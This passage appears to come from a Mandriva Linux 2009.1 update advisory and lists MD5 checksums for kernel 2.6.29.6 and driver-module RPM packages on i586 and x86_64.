2009.1/i586/hcfpcimodem-kernel-desktop586-latest-1.18-1.20090706.1mdv2009.1.i586.rpm 91d48105cfa7d81c9587b58a35615a36 2009.1/i586/hcfpcimodem-kernel-desktop-latest-1.18-1.20090706.1mdv2009.1.i586.rpm 316c8159e9b3a9c0342623a686d4eb0d 2009.1/i586/hcfpcimodem-kernel-server-latest-1.18-1.20090706.1mdv2009.1.i586.rpm 2b14b2f9e0a8622c004f77d524c1c14a 2009.1/i586/hsfmodem-kernel-2.6.29.6-desktop-1mnb-7.80.02.03-1mdv2009.1.i586.rpm 166f6eaf7f7533e0e431f2ecf432dd72 2009.1/i586/hsfmodem-kernel-2.6.29.6-desktop586-1mnb-7.80.02.03-1mdv2009.1.i586.rpm 53f0ad753ea724b3d0c2f5c3fdc5d23c 2009.1/i586/hsfmodem-kernel-2.6.29.6-server-1mnb-7.80.02.03-1mdv2009.1.i586.rpm de969d5173430bb3cc751b3c76e85221 2009.1/i586/hsfmodem-kernel-desktop586-latest-7.80.02.03-1.20090706.1mdv2009.1.i586.rpm aca77576d5f7ac2ddc317f57c3ea647d 2009.1/i586/hsfmodem-kernel-desktop-latest-7.80.02.03-1.20090706.1mdv2009.1.i586.rpm e0d31db1ea1aecf24e94f3646173b307 2009.1/i586/hsfmodem-kernel-server-latest-7.80.02.03-1.20090706.1mdv2009.1.i586.rpm 7ceaebb47f3a945824d95d2f2f7bd8c9 2009.1/i586/hso-kernel-2.6.29.6-desktop-1mnb-1.2-3mdv2009.1.i586.rpm 28e158fba8476d99288f9378134d581b 2009.1/i586/hso-kernel-2.6.29.6-desktop586-1mnb-1.2-3mdv2009.1.i586.rpm c126a27e5b35f08f131bbd1e7f60c976 2009.1/i586/hso-kernel-2.6.29.6-server-1mnb-1.2-3mdv2009.1.i586.rpm fcb5272abcff344439133ebae3027ca1 2009.1/i586/hso-kernel-desktop586-latest-1.2-1.20090706.3mdv2009.1.i586.rpm 87dba486ed876c798976500a937b2fae 2009.1/i586/hso-kernel-desktop-latest-1.2-1.20090706.3mdv2009.1.i586.rpm 277703267a44bb5b3c1d092094fbb664 2009.1/i586/hso-kernel-server-latest-1.2-1.20090706.3mdv2009.1.i586.rpm 1ee7bb259a619dceb5bb483e4d322c9e 2009.1/i586/kernel-2.6.29.6-1mnb-1-1mnb2.i586.rpm 254d9ac2c23d1c5e2ab3d0f4405c9895 2009.1/i586/kernel-desktop-2.6.29.6-1mnb-1-1mnb2.i586.rpm b41055309e0798ecfa3f3115f833a203 2009.1/i586/kernel-desktop586-2.6.29.6-1mnb-1-1mnb2.i586.rpm 00bf4b91aa3fcf39a55765e9333c5f04 2009.1/i586/kernel-desktop586-devel-2.6.29.6-1mnb-1-1mnb2.i586.rpm e413318a89a1153e9227fbc9fc828b1b 2009.1/i586/kernel-desktop586-devel-latest-2.6.29.6-1mnb2.i586.rpm d3753131cfe675a7866fcf3868e3c0d6 2009.1/i586/kernel-desktop586-latest-2.6.29.6-1mnb2.i586.rpm e33d484cdce2bebfd5de0b98636dbf7f 2009.1/i586/kernel-desktop-devel-2.6.29.6-1mnb-1-1mnb2.i586.rpm 21c36f1b38dcfea1c7181829838d0244 2009.1/i586/kernel-desktop-devel-latest-2.6.29.6-1mnb2.i586.rpm bfa29cb139d553245a52e8fcffff4f5c 2009.1/i586/kernel-desktop-latest-2.6.29.6-1mnb2.i586.rpm 085ce4b2d9c73767df080905742522d1 2009.1/i586/kernel-doc-2.6.29.6-1mnb2.i586.rpm 7f63608ff40a2857971ed44c19d32ffa 2009.1/i586/kernel-server-2.6.29.6-1mnb-1-1mnb2.i586.rpm 09b9402aeef5e517aae3154f089e8a29 2009.1/i586/kernel-server-devel-2.6.29.6-1mnb-1-1mnb2.i586.rpm 2f081fd9eacf411fb67933296497f3f3 2009.1/i586/kernel-server-devel-latest-2.6.29.6-1mnb2.i586.rpm a82f94512147486ef8f8d4c1edf6b3b2 2009.1/i586/kernel-server-latest-2.6.29.6-1mnb2.i586.rpm 3eac7116c002b258aa2e7aaf16ef3775 2009.1/i586/kernel-source-2.6.29.6-1mnb-1-1mnb2.i586.rpm 2bcb3190e7ac3ff7cba8bbe0fe296425 2009.1/i586/kernel-source-latest-2.6.29.6-1mnb2.i586.rpm e8854ce29bb7144f9a36c17bd75d4779 2009.1/i586/kqemu-kernel-2.6.29.6-desktop-1mnb-1.4.0pre1-4.i586.rpm cc1618225f588ec13ab51be896bc184d 2009.1/i586/kqemu-kernel-2.6.29.6-desktop586-1mnb-1.4.0pre1-4.i586.rpm 1847596459461a362d3ec5b94f4e5ee2 2009.1/i586/kqemu-kernel-2.6.29.6-server-1mnb-1.4.0pre1-4.i586.rpm 386f5c4e5253583d392acf3ed380901f 2009.1/i586/kqemu-kernel-desktop586-latest-1.4.0pre1-1.20090706.4.i586.rpm bcf2e865b506c50aaa22b69f8c14e0ae 2009.1/i586/kqemu-kernel-desktop-latest-1.4.0pre1-1.20090706.4.i586.rpm 7276457e8655ac680447ec0f72cf2c08 2009.1/i586/kqemu-kernel-server-latest-1.4.0pre1-1.20090706.4.i586.rpm 2f42720036067180805d9728385f4bff 2009.1/i586/libafs-kernel-2.6.29.6-desktop-1mnb-1.4.10-1mdv2009.1.i586.rpm 8b7c712f659cab2cdb157e72f4113345 2009.1/i586/libafs-kernel-2.6.29.6-desktop586-1mnb-1.4.10-1mdv2009.1.i586.rpm ab6feca9e64e20fc82a4526d2de5cdba 2009.1/i586/libafs-kernel-2.6.29.6-server-1mnb-1.4.10-1mdv2009.1.i586.rpm e7576e2166ae0e729a5182a8aa30be53 2009.1/i586/libafs-kernel-desktop586-latest-1.4.10-1.20090706.1mdv2009.1.i586.rpm 9f359bcaf61330d132c02be97cd2b4b6 2009.1/i586/libafs-kernel-desktop-latest-1.4.10-1.20090706.1mdv2009.1.i586.rpm a282dcc01ea38e7a43f19cad3b8a1e2f 2009.1/i586/libafs-kernel-server-latest-1.4.10-1.20090706.1mdv2009.1.i586.rpm 0d2ff022356e9331c2319e2c240bc084 2009.1/i586/lirc-kernel-2.6.29.6-desktop-1mnb-0.8.5-0.20090320.1mdv2009.1.i586.rpm 82d7960043d97a73b1816bb985ba9c98 2009.1/i586/lirc-kernel-2.6.29.6-desktop586-1mnb-0.8.5-0.20090320.1mdv2009.1.i586.rpm 491bdafe0a73f4e3050c4202f97bf66e 2009.1/i586/lirc-kernel-2.6.29.6-server-1mnb-0.8.5-0.20090320.1mdv2009.1.i586.rpm 1040c57b53365f3b0e3474648a7b76d3 2009.1/i586/lirc-kernel-desktop586-latest-0.8.5-1.20090706.0.20090320.1mdv2009.1.i586.rpm 2d4a72d93a4d991996ec834f4ed1f508 2009.1/i586/lirc-kernel-desktop-latest-0.8.5-1.20090706.0.20090320.1mdv2009.1.i586.rpm ff972373d8e8519ac55b5a5d4c43c3eb 2009.1/i586/lirc-kernel-server-latest-0.8.5-1.20090706.0.20090320.1mdv2009.1.i586.rpm 2824d15b2b4fb7fc077f5596f8d53824 2009.1/i586/lzma-kernel-2.6.29.6-desktop-1mnb-4.43-27.1mdv2009.1.i586.rpm 662bf6edec5814fde153492593262fc9 2009.1/i586/lzma-kernel-2.6.29.6-desktop586-1mnb-4.43-27.1mdv2009.1.i586.rpm b2cb9479ed97d21088c1e7f379d555b2 2009.1/i586/lzma-kernel-2.6.29.6-server-1mnb-4.43-27.1mdv2009.1.i586.rpm 24113b58ef4b3ee5dd86de4b93029e8f 2009.1/i586/lzma-kernel-desktop586-latest-4.43-1.20090706.27.1mdv2009.1.i586.rpm dfd8cc869d3266c14601c078948fe087 2009.1/i586/lzma-kernel-desktop-latest-4.43-1.20090706.27.1mdv2009.1.i586.rpm 23a49d8721ab45c48b7128c0b151e40c 2009.1/i586/lzma-kernel-server-latest-4.43-1.20090706.27.1mdv2009.1.i586.rpm 98370602bb5c3876b7540bff510a1199 2009.1/i586/madwifi-kernel-2.6.29.6-desktop-1mnb-0.9.4-4.r3998mdv2009.1.i586.rpm 0b77c3502de5e57881d6f3d6838d0af6 2009.1/i586/madwifi-kernel-2.6.29.6-desktop586-1mnb-0.9.4-4.r3998mdv2009.1.i586.rpm f6a6c3d56dd6c377ee62530342f82564 2009.1/i586/madwifi-kernel-2.6.29.6-server-1mnb-0.9.4-4.r3998mdv2009.1.i586.rpm 622ca943305e6e1c1c487727114e2d8e 2009.1/i586/madwifi-kernel-desktop586-latest-0.9.4-1.20090706.4.r3998mdv2009.1.i586.rpm fdc7ef1ef0c08049c259c7040669c7f3 2009.1/i586/madwifi-kernel-desktop-latest-0.9.4-1.20090706.4.r3998mdv2009.1.i586.rpm 0512bf2bd0ee4e62f251d7d9f3181aae 2009.1/i586/madwifi-kernel-server-latest-0.9.4-1.20090706.4.r3998mdv2009.1.i586.rpm fdb21f3d84fe7b23eb4c63a6df785d84 2009.1/i586/netfilter-rtsp-kernel-2.6.29.6-desktop-1mnb-2.6.26-2mdv2009.1.i586.rpm 0997695bb30161116cf8ac3c9f1a2fe3 2009.1/i586/netfilter-rtsp-kernel-2.6.29.6-desktop586-1mnb-2.6.26-2mdv2009.1.i586.rpm dbc63d211cae79c082bd43d793915117 2009.1/i586/netfilter-rtsp-kernel-2.6.29.6-server-1mnb-2.6.26-2mdv2009.1.i586.rpm 6250466c06292228595a16117d01f794 2009.1/i586/netfilter-rtsp-kernel-desktop586-latest-2.6.26-1.20090706.2mdv2009.1.i586.rpm 58a4376ba6c1b1795c60f456f99465ca 2009.1/i586/netfilter-rtsp-kernel-desktop-latest-2.6.26-1.20090706.2mdv2009.1.i586.rpm 257e5e415ecda3f1968866d360a62191 2009.1/i586/netfilter-rtsp-kernel-server-latest-2.6.26-1.20090706.2mdv2009.1.i586.rpm 40e572a372ecabc14693a365550458fa 2009.1/i586/nouveau-kernel-2.6.29.6-desktop-1mnb-0.0.12-0.20090329.1mdv2009.1.i586.rpm 0a8db04d3d4f0bacf197c4650777ff9a 2009.1/i586/nouveau-kernel-2.6.29.6-desktop586-1mnb-0.0.12-0.20090329.1mdv2009.1.i586.rpm 5f5982460cbe0d3cb188effb92416674 2009.1/i586/nouveau-kernel-2.6.29.6-server-1mnb-0.0.12-0.20090329.1mdv2009.1.i586.rpm be4de90bb63637be681920ce9764a8c5 2009.1/i586/nouveau-kernel-desktop586-latest-0.0.12-1.20090706.0.20090329.1mdv2009.1.i586.rpm 667a9dbbf3b28687d6e3e26b37c50205 2009.1/i586/nouveau-kernel-desktop-latest-0.0.12-1.20090706.0.20090329.1mdv2009.1.i586.rpm 086a8ab39b8ec4510215dc1a6ca09e18 2009.1/i586/nouveau-kernel-server-latest-0.0.12-1.20090706.0.20090329.1mdv2009.1.i586.rpm 06b9c83b3082fdb28f1b42a8c4295bbb 2009.1/i586/nvidia173-kernel-2.6.29.6-desktop-1mnb-173.14.18-2mdv2009.1.i586.rpm cb02a99eb9c45d3723c0cefb9be7a7d4 2009.1/i586/nvidia173-kernel-2.6.29.6-desktop586-1mnb-173.14.18-2mdv2009.1.i586.rpm fdd3384ea578c222613facb4fa3756c1 2009.1/i586/nvidia173-kernel-2.6.29.6-server-1mnb-173.14.18-2mdv2009.1.i586.rpm e35ca4da5353c2d331de35439f7ddd45 2009.1/i586/nvidia173-kernel-desktop586-latest-173.14.18-1.20090706.2mdv2009.1.i586.rpm 79e5f7baebec2fc8858c5492f499efb0 2009.1/i586/nvidia173-kernel-desktop-latest-173.14.18-1.20090706.2mdv2009.1.i586.rpm 4f17944567f4afbe4e553a9228ba865f 2009.1/i586/nvidia173-kernel-server-latest-173.14.18-1.20090706.2mdv2009.1.i586.rpm 5b0b350c883f6de8fd04e4e150945586 2009.1/i586/nvidia96xx-kernel-2.6.29.6-desktop-1mnb-96.43.11-5mdv2009.1.i586.rpm 9e3667c408c8e50f760c354c3052ec10 2009.1/i586/nvidia96xx-kernel-2.6.29.6-desktop586-1mnb-96.43.11-5mdv2009.1.i586.rpm 8b31cffce1e071aa68fb0cf8474381b0 2009.1/i586/nvidia96xx-kernel-2.6.29.6-server-1mnb-96.43.11-5mdv2009.1.i586.rpm 471ca99ecfe4d3bcad7d6c2e9d9c9e15 2009.1/i586/nvidia96xx-kernel-desktop586-latest-96.43.11-1.20090706.5mdv2009.1.i586.rpm 0b77ffc7a41c3a8fdf260611751788fa 2009.1/i586/nvidia96xx-kernel-desktop-latest-96.43.11-1.20090706.5mdv2009.1.i586.rpm 95645367b88789e7aba396e1a14fd665 2009.1/i586/nvidia96xx-kernel-server-latest-96.43.11-1.20090706.5mdv2009.1.i586.rpm 954e547274acfaef30f462fc4ba1c4df 2009.1/i586/nvidia-current-kernel-2.6.29.6-desktop-1mnb-180.51-1mdv2009.1.i586.rpm ccd0affab0a52e80f51eb3691a685b28 2009.1/i586/nvidia-current-kernel-2.6.29.6-desktop586-1mnb-180.51-1mdv2009.1.i586.rpm 3036450e0976d98f029de5ddc33b194a 2009.1/i586/nvidia-current-kernel-2.6.29.6-server-1mnb-180.51-1mdv2009.1.i586.rpm 6566f3ae8db2e8b0a9694815f367b78f 2009.1/i586/nvidia-current-kernel-desktop586-latest-180.51-1.20090706.1mdv2009.1.i586.rpm 1b65d9f163090c39c98ad677216ea3fe 2009.1/i586/nvidia-current-kernel-desktop-latest-180.51-1.20090706.1mdv2009.1.i586.rpm 98b74f59debff152c942a4dd8d73abb5 2009.1/i586/nvidia-current-kernel-server-latest-180.51-1.20090706.1mdv2009.1.i586.rpm 9dd72553dd46a2b9c90eb97f4d382de2 2009.1/i586/opencbm-kernel-2.6.29.6-desktop-1mnb-0.4.2a-4mdv2009.1.i586.rpm b6a9c71e2cc2c5d95b14a9c230c41d47 2009.1/i586/opencbm-kernel-2.6.29.6-desktop586-1mnb-0.4.2a-4mdv2009.1.i586.rpm c2cf89b0fd1b8cce1eb10e0c9aec439a 2009.1/i586/opencbm-kernel-2.6.29.6-server-1mnb-0.4.2a-4mdv2009.1.i586.rpm 03f8c4791182f65005e9c07e84ccb37e 2009.1/i586/opencbm-kernel-desktop586-latest-0.4.2a-1.20090706.4mdv2009.1.i586.rpm aac47261586a6c6f09e7e729c82cc95e 2009.1/i586/opencbm-kernel-desktop-latest-0.4.2a-1.20090706.4mdv2009.1.i586.rpm 8e1a16e940218ad11721519d4e5cda59 2009.1/i586/opencbm-kernel-server-latest-0.4.2a-1.20090706.4mdv2009.1.i586.rpm 84c865b1b7ec852b0a4f64f26de42da5 2009.1/i586/rt2870-kernel-2.6.29.6-desktop-1mnb-1.4.0.0-1mdv2009.1.i586.rpm 80a4454634d0d13b9074b8938a521b59 2009.1/i586/rt2870-kernel-2.6.29.6-desktop586-1mnb-1.4.0.0-1mdv2009.1.i586.rpm d832e2c48a3440490f6ca8b5ed1efde1 2009.1/i586/rt2870-kernel-2.6.29.6-server-1mnb-1.4.0.0-1mdv2009.1.i586.rpm 61c4f71de2fc57c9a8ce85d2c23d1a9d 2009.1/i586/rt2870-kernel-desktop586-latest-1.4.0.0-1.20090706.1mdv2009.1.i586.rpm c4c02d7c1e8c1c646d8117067b54d1f1 2009.1/i586/rt2870-kernel-desktop-latest-1.4.0.0-1.20090706.1mdv2009.1.i586.rpm faf67367fea2e1902f2f32339a8fa98f 2009.1/i586/rt2870-kernel-server-latest-1.4.0.0-1.20090706.1mdv2009.1.i586.rpm ef37ada23fce137446deb5c8cfa7c3ae 2009.1/i586/slmodem-kernel-2.6.29.6-desktop-1mnb-2.9.11-0.20080817.4mdv2009.1.i586.rpm 36c387aa9a3e34c3b2ac76becbe2c369 2009.1/i586/slmodem-kernel-2.6.29.6-desktop586-1mnb-2.9.11-0.20080817.4mdv2009.1.i586.rpm 39173f08964f2b2feffbf40f94d6ab04 2009.1/i586/slmodem-kernel-2.6.29.6-server-1mnb-2.9.11-0.20080817.4mdv2009.1.i586.rpm ad163e6d4cf1706eb6c6653e443e8f5d 2009.1/i586/slmodem-kernel-desktop586-latest-2.9.11-1.20090706.0.20080817.4mdv2009.1.i586.rpm 023c74bdbb4fb24239e7854f14124df4 2009.1/i586/slmodem-kernel-desktop-latest-2.9.11-1.20090706.0.20080817.4mdv2009.1.i586.rpm 124ffc16d59f02c6f4d593fb24e18350 2009.1/i586/slmodem-kernel-server-latest-2.9.11-1.20090706.0.20080817.4mdv2009.1.i586.rpm d3e097721e76d9458414c59c636aaeda 2009.1/i586/squashfs-kernel-2.6.29.6-desktop-1mnb-3.4-1mdv2009.1.i586.rpm baf0704d9156efea7e357a16abc07353 2009.1/i586/squashfs-kernel-2.6.29.6-desktop586-1mnb-3.4-1mdv2009.1.i586.rpm 995d9b17e60976721c911f195e0d1c7f 2009.1/i586/squashfs-kernel-2.6.29.6-server-1mnb-3.4-1mdv2009.1.i586.rpm 37ab74292138b778a85fbbc3f7711c0c 2009.1/i586/squashfs-kernel-desktop586-latest-3.4-1.20090706.1mdv2009.1.i586.rpm b54a8189b0a3b9fb33fe4075904049b3 2009.1/i586/squashfs-kernel-desktop-latest-3.4-1.20090706.1mdv2009.1.i586.rpm 07fc810834d20ade7169a05bb40bd5f8 2009.1/i586/squashfs-kernel-server-latest-3.4-1.20090706.1mdv2009.1.i586.rpm 82dfe8f3b2d4d7d1d044ad4abb31bd50 2009.1/i586/squashfs-lzma-kernel-2.6.29.6-desktop-1mnb-3.3-10mdv2009.1.i586.rpm 610e946024f7361d8683fafc1b7b3b91 2009.1/i586/squashfs-lzma-kernel-2.6.29.6-desktop586-1mnb-3.3-10mdv2009.1.i586.rpm 977012036889a6ae1a5e43d7690c5e9f 2009.1/i586/squashfs-lzma-kernel-2.6.29.6-server-1mnb-3.3-10mdv2009.1.i586.rpm 063064db7e54e8b8fecd24fbac0acf15 2009.1/i586/squashfs-lzma-kernel-desktop586-latest-3.3-1.20090706.10mdv2009.1.i586.rpm 240b0de473b89b48d7863411cb3bd29d 2009.1/i586/squashfs-lzma-kernel-desktop-latest-3.3-1.20090706.10mdv2009.1.i586.rpm 0d63026b71b0d0492eada8aacb3d4b50 2009.1/i586/squashfs-lzma-kernel-server-latest-3.3-1.20090706.10mdv2009.1.i586.rpm 920572e9d1daf9664c582ea4387416ba 2009.1/i586/syntek-kernel-2.6.29.6-desktop-1mnb-1.3.1-5mdv2009.1.i586.rpm 888909a3b4de61d46bcc4a3597ec9a96 2009.1/i586/syntek-kernel-2.6.29.6-desktop586-1mnb-1.3.1-5mdv2009.1.i586.rpm ced247f46acd48d6f014f86cf244af48 2009.1/i586/syntek-kernel-2.6.29.6-server-1mnb-1.3.1-5mdv2009.1.i586.rpm 4ccee3ca7304a634f346d59f187a3d75 2009.1/i586/syntek-kernel-desktop586-latest-1.3.1-1.20090706.5mdv2009.1.i586.rpm 45a492e9fed869a629e0f5a02d1d16fc 2009.1/i586/syntek-kernel-desktop-latest-1.3.1-1.20090706.5mdv2009.1.i586.rpm 5826f5cb73b04dd340850bbfed730456 2009.1/i586/syntek-kernel-server-latest-1.3.1-1.20090706.5mdv2009.1.i586.rpm 110eac49f085952e20a33994fdf427ba 2009.1/i586/tp_smapi-kernel-2.6.29.6-desktop-1mnb-0.40-2mdv2009.1.i586.rpm dd15c58be8f9e0248561dc3b8dcd222c 2009.1/i586/tp_smapi-kernel-2.6.29.6-desktop586-1mnb-0.40-2mdv2009.1.i586.rpm 541de7fd686afaefb30a40a8cd2f093f 2009.1/i586/tp_smapi-kernel-2.6.29.6-server-1mnb-0.40-2mdv2009.1.i586.rpm ca625fcac5623bae05d34dcba8a73445 2009.1/i586/tp_smapi-kernel-desktop586-latest-0.40-1.20090706.2mdv2009.1.i586.rpm 6921cb8836d46dad059a07b200c6a988 2009.1/i586/tp_smapi-kernel-desktop-latest-0.40-1.20090706.2mdv2009.1.i586.rpm 3069eabcacb3fbf671025158fa3a4ef8 2009.1/i586/tp_smapi-kernel-server-latest-0.40-1.20090706.2mdv2009.1.i586.rpm 29b079328e49184a4778f590e311378f 2009.1/i586/vboxadditions-kernel-2.6.29.6-desktop-1mnb-2.2.0-4mdv2009.1.i586.rpm a5f21ac33aaa5c2408a346f12d76e3f7 2009.1/i586/vboxadditions-kernel-2.6.29.6-desktop586-1mnb-2.2.0-4mdv2009.1.i586.rpm 09e6634242489d338304e51d1ec1eb2a 2009.1/i586/vboxadditions-kernel-2.6.29.6-server-1mnb-2.2.0-4mdv2009.1.i586.rpm 577c4ecdcf6ae70b2e523f3331c4a89e 2009.1/i586/vboxadditions-kernel-desktop586-latest-2.2.0-1.20090706.4mdv2009.1.i586.rpm 2f194e67c3660b5a5efd8aedd1920659 2009.1/i586/vboxadditions-kernel-desktop-latest-2.2.0-1.20090706.4mdv2009.1.i586.rpm 1fd3c69dadbcd27accb546bb23f63d1d 2009.1/i586/vboxadditions-kernel-server-latest-2.2.0-1.20090706.4mdv2009.1.i586.rpm 07ac2b8e8d11dfd888daa2b8e7e2be3a 2009.1/i586/vhba-kernel-2.6.29.6-desktop-1mnb-1.2.1-2mdv2009.1.i586.rpm 3a32f528b9f60df80a3b075949e13d1a 2009.1/i586/vhba-kernel-2.6.29.6-desktop586-1mnb-1.2.1-2mdv2009.1.i586.rpm e3244a329c8178f54278770a8d61c6bd 2009.1/i586/vhba-kernel-2.6.29.6-server-1mnb-1.2.1-2mdv2009.1.i586.rpm eeb0d9f5c7a33e3abb008be914e03642 2009.1/i586/vhba-kernel-desktop586-latest-1.2.1-1.20090706.2mdv2009.1.i586.rpm 52f3875971865954af8e39d3ec72640d 2009.1/i586/vhba-kernel-desktop-latest-1.2.1-1.20090706.2mdv2009.1.i586.rpm f71f1f17954cc9669b22c3db3aae0e65 2009.1/i586/vhba-kernel-server-latest-1.2.1-1.20090706.2mdv2009.1.i586.rpm a80b504677dfe23dfc1d8268be6a6bf1 2009.1/i586/virtualbox-kernel-2.6.29.6-desktop-1mnb-2.2.0-4mdv2009.1.i586.rpm 8682a6d5447d3251ec536066b4dca531 2009.1/i586/virtualbox-kernel-2.6.29.6-desktop586-1mnb-2.2.0-4mdv2009.1.i586.rpm 2948e386152fbc42d188d8728f67737c 2009.1/i586/virtualbox-kernel-2.6.29.6-server-1mnb-2.2.0-4mdv2009.1.i586.rpm b809978be06ebee0cd8e6be2d6b80147 2009.1/i586/virtualbox-kernel-desktop586-latest-2.2.0-1.20090706.4mdv2009.1.i586.rpm bbda9088a5c4d87ff8e2b1ea110943b0 2009.1/i586/virtualbox-kernel-desktop-latest-2.2.0-1.20090706.4mdv2009.1.i586.rpm 89c1a97969c2558e1f6ffaf18b5eedc7 2009.1/i586/virtualbox-kernel-server-latest-2.2.0-1.20090706.4mdv2009.1.i586.rpm 5d0235143bfe36b193aa47319777ee14 2009.1/i586/vpnclient-kernel-2.6.29.6-desktop-1mnb-4.8.01.0640-3mdv2009.0.i586.rpm 2409758229545530d933854435eefda5 2009.1/i586/vpnclient-kernel-2.6.29.6-desktop586-1mnb-4.8.01.0640-3mdv2009.0.i586.rpm 77ad0153f9b56206d23f4cc2b2aa86ea 2009.1/i586/vpnclient-kernel-2.6.29.6-server-1mnb-4.8.01.0640-3mdv2009.0.i586.rpm 939d294d34b55c05647f0f46ce0619e1 2009.1/i586/vpnclient-kernel-desktop586-latest-4.8.01.0640-1.20090706.3mdv2009.0.i586.rpm 83a06e98feba58706a3c51f226dfc74d 2009.1/i586/vpnclient-kernel-desktop-latest-4.8.01.0640-1.20090706.3mdv2009.0.i586.rpm 5cc1c4a7171498e59e54c9e9b7d8afc5 2009.1/i586/vpnclient-kernel-server-latest-4.8.01.0640-1.20090706.3mdv2009.0.i586.rpm 717afe0227c203e47d079595bf5924f7 2009.1/SRPMS/kernel-2.6.29.6-1mnb2.src.rpm Mandriva Linux 2009.1/X86_64: cb6506eae36c2848dda87d90113d92ef 2009.1/x86_64/alsa_raoppcm-kernel-2.6.29.6-desktop-1mnb-0.5.1-2mdv2008.0.x86_64.rpm 9ddd090f409e7d66cd22e802da209b3f 2009.1/x86_64/alsa_raoppcm-kernel-2.6.29.6-server-1mnb-0.5.1-2mdv2008.0.x86_64.rpm 95dca7b5677b20cb78087b048763601e 2009.1/x86_64/alsa_raoppcm-kernel-desktop-latest-0.5.1-1.20090706.2mdv2008.0.x86_64.rpm 39b48efc760e3869003f17c7cb504378 2009.1/x86_64/alsa_raoppcm-kernel-server-latest-0.5.1-1.20090706.2mdv2008.0.x86_64.rpm 436e238e0407a334763c52828ccd9d3d 2009.1/x86_64/broadcom-wl-kernel-2.6.29.6-desktop-1mnb-5.10.79.10-1mdv2009.1.x86_64.rpm 4850c8cf39e7e322a64ebef74c96e614 2009.1/x86_64/broadcom-wl-kernel-2.6.29.6-server-1mnb-5.10.79.10-1mdv2009.1.x86_64.rpm 71239e8be96fe33ffa971e13f6b49c67 2009.1/x86_64/broadcom-wl-kernel-desktop-latest-5.10.79.10-1.20090706.1mdv2009.1.x86_64.rpm baadc48de2216a787f86189f94fbba50 2009.1/x86_64/broadcom-wl-kernel-server-latest-5.10.79.10-1.20090706.1mdv2009.1.x86_64.rpm 0b463931b9422ef42cc74a51efbaf5fb 2009.1/x86_64/em8300-kernel-2.6.29.6-desktop-1mnb-0.17.2-1mdv2009.1.x86_64.rpm 9b9e2b1f303c33a1515151cc643ab657 2009.1/x86_64/em8300-kernel-2.6.29.6-server-1mnb-0.17.2-1mdv2009.1.x86_64.rpm fb5a6e7d9877ea53fdc7cd56dd712ae2 2009.1/x86_64/em8300-kernel-desktop-latest-0.17.2-1.20090706.1mdv2009.1.x86_64.rpm dfc7672192b9dd6ac2c54d041a379f9d 2009.1/x86_64/em8300-kernel-server-latest-0.17.2-1.20090706.1mdv2009.1.x86_64.rpm 43386b5f075c64a53910765eb99de579 2009.1/x86_64/fglrx-kernel-2.6.29.6-desktop-1mnb-8.600-2mdv2009.1.x86_64.rpm 6bded640001a87effc8295999fa1fdf4 2009.1/x86_64/fglrx-kernel-2.6.29.6-server-1mnb-8.600-2mdv2009.1.x86_64.rpm a71e9b68bda00d44d6b3b586b18804e3 2009.1/x86_64/fglrx-kernel-desktop-latest-8.600-1.20090706.2mdv2009.1.x86_64.rpm fef9c216eac1e1d97fe7535d13befe5c 2009.1/x86_64/fglrx-kernel-server-latest-8.600-1.20090706.2mdv2009.1.x86_64.rpm e1fa435873649ebedc3f203271de12f3 2009.1/x86_64/hsfmodem-kernel-2.6.29.6-desktop-1mnb-7.80.02.03-1mdv2009.1.x86_64.rpm a43196e5e7b6d3c8f0017f5b48c4cbe7 2009.1/x86_64/hsfmodem-kernel-2.6.29.6-server-1mnb-7.80.02.03-1mdv2009.1.x86_64.rpm cad5b0becf69691f1bc16487a7bb4323 2009.1/x86_64/hsfmodem-kernel-desktop-latest-7.80.02.03-1.20090706.1mdv2009.1.x86_64.rpm 9d9106288625673712d5842ac9b47270 2009.1/x86_64/hsfmodem-kernel-server-latest-7.80.02.03-1.20090706.1mdv2009.1.x86_64.rpm 39ba61d3b814d4f466a646632fd78aed 2009.1/x86_64/hso-kernel-2.6.29.6-desktop-1mnb-1.2-3mdv2009.1.x86_64.rpm 18c57a709212dbcb64031ab1d429e7f3 2009.1/x86_64/hso-kernel-2.6.29.6-server-1mnb-1.2-3mdv2009.1.x86_64.rpm 8e166649260bdc74180af5cfce05ec7f 2009.1/x86_64/hso-kernel-desktop-latest-1.2-1.20090706.3mdv2009.1.x86_64.rpm ab7166d8289532e37700f5f582cf2175 2009.1/x86_64/hso-kernel-server-latest-1.2-1.20090706.3mdv2009.1.x86_64.rpm 269d4234fcc6a621db7a110d601c45b9 2009.1/x86_64/kernel-2.6.29.6-1mnb-1-1mnb2.x86_64.rpm afd9e0d488ef36b3aeab1bbedcca2688 2009.1/x86_64/kernel-desktop-2.6.29.6-1mnb-1-1mnb2.x86_64.rpm c06b6b9ea85e6cc92a214353252e422c 2009.1/x86_64/kernel-desktop-devel-2.6.29.6-1mnb-1-1mnb2.x86_64.rpm 2c3eef720b563a0c00a04b0cc0d883fd 2009.1/x86_64/kernel-desktop-devel-latest-2.6.29.6-1mnb2.x86_64.rpm b1cf0d6e21ace41865eb37a18c423426 2009.1/x86_64/kernel-desktop-latest-2.6.29.6-1mnb2.x86_64.rpm 849e445a604766be50e0c090c7c57eae 2009.1/x86_64/kernel-doc-2.6.29.6-1mnb2.x86_64.rpm 6dcf85fbec5f5343af732a2ace446213 2009.1/x86_64/kernel-server-2.6.29.6-1mnb-1-1mnb2.x86_64.rpm 4341cc6b4b85c1d452b2025a9be8375f 2009.1/x86_64/kernel-server-devel-2.6.29.6-1mnb-1-1mnb2.x86_64.rpm 3b93ea92d0ec03a5e999dad234a66ef2 2009.1/x86_64/kernel-server-devel-latest-2.6.29.6-1mnb2.x86_64.rpm 716d7a093676793ec3fda8e0d71560a3 2009.1/x86_64/kernel-server-latest-2.6.29.6-1mnb2.x86_64.rpm d77b1d9067144b7674656503ee143d54 2009.1/x86_64/kernel-source-2.6.29.6-1mnb-1-1mnb2.x86_64.rpm 48be2119769079d247328833121bdb8a 2009.1/x86_64/kernel-source-latest-2.6.29.6-1mnb2.x86_64.rpm febbacc5f56a23f620431d204ee4a930 2009.1/x86_64/kqemu-kernel-2.6.29.6-desktop-1mnb-1.4.0pre1-4.x86_64.rpm df6c865df1fa9dee5fd8e86bff38abdc 2009.1/x86_64/kqemu-kernel-2.6.29.6-server-1mnb-1.4.0pre1-4.x86_64.rpm c60b5e4a5ccbe0062786a5c0148b8741 2009.1/x86_64/kqemu-kernel-desktop-latest-1.4.0pre1-1.20090706.4.x86_64.rpm 3fee473d1eb3070a09ed3a7649dd26b5 2009.1/x86_64/kqemu-kernel-server-latest-1.4.0pre1-1.20090706.4.x86_64.rpm 216d440a2d0e9197e52e3a7a35bc6333 